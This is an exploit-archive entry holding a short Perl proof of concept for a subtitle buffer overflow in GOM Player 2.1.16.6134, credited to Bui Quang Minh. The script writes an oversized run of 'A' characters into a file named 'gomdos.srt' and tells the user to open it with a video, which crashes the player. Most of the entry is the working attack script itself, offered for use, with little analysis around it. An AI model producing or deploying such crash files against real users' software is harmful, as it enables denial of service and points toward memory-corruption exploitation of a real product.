id: 6807
date: 04/07/2009
title: GOM Player 2.1.16.6134 Subtitle Local Buffer Overflow PoC
author: Bui Quang Minh
cves: 

=========================================================
GOM Player 2.1.16.6134 Subtitle Local Buffer Overflow PoC
=========================================================




#!/usr/local/bin/perl

##################################################################
#
#	Title : GOM Player Subtitle Buffer Overflow Vulnerabiltity
#	Discovery by : Bui Quang Minh
#	Tested : GOM Player 2.1.16.6134
#	Reference : Bkis [http://security.bkis.vn/?p=501]
#	PoC : Windows XP (Silently Crash) and Windows Vista, Windows 7.
#	
##################################################################

my $buffer = "A" x 10240 x 4;
my $filename = "gomdos.srt";
open (FILE,">$filename") || die "\nCan't open $file: $!";
print FILE "$buffer";
close (FILE);
print "\nSuccessfully!\n\nPlease try $filename with a video file!\n";




#  0day.today [2023-03-26]  #